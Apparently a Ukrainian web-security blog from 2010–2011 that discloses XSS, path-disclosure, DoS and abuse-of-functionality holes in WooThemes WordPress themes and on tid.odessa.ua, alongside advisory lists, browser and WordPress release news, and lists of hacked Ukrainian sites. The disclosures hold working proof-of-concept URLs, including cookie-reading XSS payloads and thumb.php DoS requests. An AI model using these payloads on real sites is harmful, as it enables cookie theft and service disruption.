Websecurity - Веб безпека

В даній добірці уразливості в веб додатках:

• Novell Sentinel Log Manager Multiple Servlet Remote Code Execution Vulnerabilities (деталі)
• LFI and XSS vulnerability in openEngine (деталі)
• SQL injection in CompactCMS (деталі)
• Baby ASP Web Server DoS (деталі)
• SQL Injection in CLANSPHERE (деталі)
• XSS in CLANSPHERE (деталі)
• Baby FTP Server DoS (деталі)
• Path disclosure in CLANSPHERE (деталі)
• BBcode XSS in CLANSPHERE (деталі)
• Baby POP Server DoS (деталі)

03.02.2011

Учора, 02.02.2011, я знайшов Cross-Site Scripting, Full path disclosure, Abuse of Functionality та Denial of Service уразливості в темі The Gazette Edition для WordPress. Це комерційний шаблон для WP від WooThemes. Які я виявив на одному сайті, що використовує даний шаблон. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в темі Live Wire Edition для WordPress.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам теми.

11.04.2011

XSS:

http://site/wp-content/themes/gazette/thumb.php?src=1%3Cbody%20onload=alert(document.cookie)%3E

Full path disclosure:

http://site/wp-content/themes/gazette/thumb.php?src=http://site
http://site/wp-content/themes/gazette/thumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/gazette/thumb.php?src=http://site/page.png&h=1111111&w=1
http://site/wp-content/themes/gazette/

А також ще десятки php-скриптів шаблону в папці /gazette/ та всіх підпапках.

Abuse of Functionality:

http://site/wp-content/themes/gazette/thumb.php?src=http://site&h=1&w=1

DoS:

http://site/wp-content/themes/gazette/thumb.php?src=http://site/big_file&h=1&w=1

Про подібні AoF та DoS уразливості я писав в статті Використання сайтів для атак на інші сайти.

Окрім папки /gazette/ в каталозі з темами, дана тема також може розміщуватися в папці /gazette-dev/gazette/.

Уразливі The Gazette Edition 2.9.4 та попередні версії. XSS можлива лише в старих версіях шаблона. Після мого попередження, розробник виправив Abuse of Functionality, DoS та деякі FPD, але все ще залишилось багато невиправлених FPD.

В березні, 09.03.2011, через місяць після виходу Google Chrome 9.0, вийшов Google Chrome 10.

Основні нововведення в даній версії:

• Оновлення JavaScript-движка V8, у нову версію якого додана нова підсистема JIT-компіляції.
• Підтримка використання GPU-акселерації при програванні відео.
• У сервісі синхронізації параметрів браузера між комп’ютерами за замовчуванням активована підтримка синхронізації збережених паролів до сайтів.
• Цілком перероблений інтерфейс настроювання параметрів браузера.
• Підтримка фонового виконання web-додатків (Background WebApps).
• Новий API для створення розширень для web-навігації (webNavigation API).
• Посилення безпеки: застарілі плагіни тепер за замовчуванням автоматично блокуються. Розширено можливості по повідомленню користувача про наявність шкідливого коду на сторінках. На платформі Windows Flash-плагін відтепер виконується в ізольованому оточенні.

Також виправлені 23 помилки у безпеці, з яких 15 уразливостей позначені як небезпечні, 3 - помірні і 5 - незначні.

• Релиз web-браузера Chrome 10 (деталі)

Після попереднього дослідження похаканих сайтів, приведу нову інформацію про взломані сайти. З числа українських сайтів.

• http://chaspik.kiev.ua (хакером SHADOWNET)
• http://coralclub.kharkov.ua (хакером Udara)
• http://moybb.com.ua (хакерам PisstoN) - 06.03.2011, зараз сайт вже виправлений адмінами
• http://www.stroyraboti.com (хакерами RKH)
• http://doktor.kiev.ua (хакером dr.net) - причому спочатку сайт був взломаний 27.01.2011 dr.net, а зараз взломаний Houssem jrad. Схоже, що сайт постійно хакається, як і деякі інші сайти в Уанеті

14.09.2010

У квітні, 24.04.2010, я знайшов Cross-Site Scripting та Insufficient Anti-automation уразливості на сайті http://tid.odessa.ua. Про що найближчим часом сповіщу адміністрацію сайта.

Раніше я вже писав про уразливості на tid.odessa.ua.

Детальна інформація про уразливості з’явиться пізніше. Треба дати час адмінам на реакцію з цього приводу.

09.04.2011

XSS:

• alert(document.cookie)
• alert(document.cookie) (виправлена)
• alert(document.cookie) (виправлена)
• alert(document.cookie) (перероблена версія попередньої XSS, що знову працює)
• цікавий
• html включення

Insufficient Anti-automation:

http://opt.tid.odessa.ua/ws/register.php

Brute Force:

http://tid.odessa.ua/?pid=dclogon

http://opt.tid.odessa.ua/ws/login.php

З даних уразливостей більшість досі не виправлена.

Нещодавно, 05.04.2011, вишла нова версія WordPress 3.1.1.

WordPress 3.1.1 це секюріті випуск 3.1 серії. В якому розробники зробили майже тридцять виправлень, в тому числі виправили три уразливості.

Це CSRF уразливість в медіа аплоадері, DoS в деяких середовищах через спеціальні лінки в коментарях та XSS уразливість.

В даній добірці уразливості в веб додатках:

• Novell ZENWorks Remote Management Agent Weak Authentication Remote Code Execution Vulnerability (деталі)
• IBM OmniFind - several vulnerabilities (деталі)
• JQuarks4s Joomla Component 1.0.0 Blind SQL Injection Vulnerability (деталі)
• 2Wire Broadband Router Session Hijacking Vulnerability (деталі)
• eBlog 1.7 Multiple SQL Injection Vulnerabilities (деталі)
• Eclipse IDE | Help Server Local Cross Site Scripting (XSS) Vulnerability (деталі)
• Quick ‘n Easy FTP Server v3.2 (деталі)
• Quick ‘n Easy WEB Server DoS (деталі)
• Landesk OS command injection (деталі)
• vBulletin 4.0.8 - Persistent XSS via Profile Customization (деталі)

Продовжуючи традицію, пропоную вашій увазі цікаві секюріті статті. Щоб ви поповнювали свої знання з веб безпеки.

Добірка цікавого чтива на тему безпеки, в тому числі web security (статті з Вікіпедії):

• War dialing
• Wardriving
• Warzapping
• Cross-Server Attack (XSA)
• Zero-day attack

01.02.2011

У грудні, 08.12.2008, я знайшов Cross-Site Scripting, Full path disclosure, Abuse of Functionality та Denial of Service уразливості в темі Live Wire Edition для WordPress. Це комерційний шаблон для WP від WooThemes. Які я виявив на одному сайті, що використовує даний шаблон. Про що найближчим часом повідомлю розробникам.

Раніше я вже писав про уразливості в різних шаблонах для WP, зокрема в 2007 році я писав про XSS в темах Blix та Blix Rus для WordPress.

Детальна інформація про уразливості з’явиться пізніше. Спочатку повідомлю розробникам теми.

08.04.2011

XSS:

http://site/wp-content/themes/livewire-edition/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

Full path disclosure:

http://site/wp-content/themes/livewire-edition/thumb.php?src=jpg
http://site/wp-content/themes/livewire-edition/thumb.php?src=http://site/page.png&h=1&w=1111111
http://site/wp-content/themes/livewire-edition/thumb.php?src=http://site/page.png&h=1111111&w=1
http://site/wp-content/themes/livewire-edition/

А також ще 30 php-скриптів шаблону в папці /livewire-edition/ та всіх підпапках.

Abuse of Functionality:

http://site/wp-content/themes/livewire-edition/thumb.php?src=http://site&h=1&w=1

DoS:

http://site/wp-content/themes/livewire-edition/thumb.php?src=http://site/big_file&h=1&w=1

Про подібні AoF та DoS уразливості я писав в статті Використання сайтів для атак на інші сайти.

Окрім папки /livewire-edition/, дана тема також може розміщуватися в папці /livewire-package/ (це пакет, що включає всі три теми Live Wire серії).

Уразливі Live Wire Edition 2.3.1 та попередні версії. XSS можлива лише в старих версіях шаблона. Після мого попередження, розробник виправив Abuse of Functionality, DoS та деякі FPD, але все ще залишилось багато невиправлених FPD.

Після попереднього дослідження інфікованих сайтів, приведу нову інформацію про заражені сайти. З числа українських сайтів.

• http://search.com.ua - інфекція була виявлена 06.04.2011. Зараз сайт не входить до переліку підозрілих.
• http://day-sity.ho.ua - інфекція була виявлена 26.03.2011. Зараз сайт входить до переліку підозрілих.
• http://kvn.odessa.ua - інфекція була виявлена 30.03.2011. Зараз сайт не входить до переліку підозрілих.
• http://cinemanet.org.ua - інфекція була виявлена 29.03.2011. Зараз сайт входить до переліку підозрілих.
• http://spie.kiev.ua - інфекція була виявлена 27.03.2011. Зараз сайт не входить до переліку підозрілих.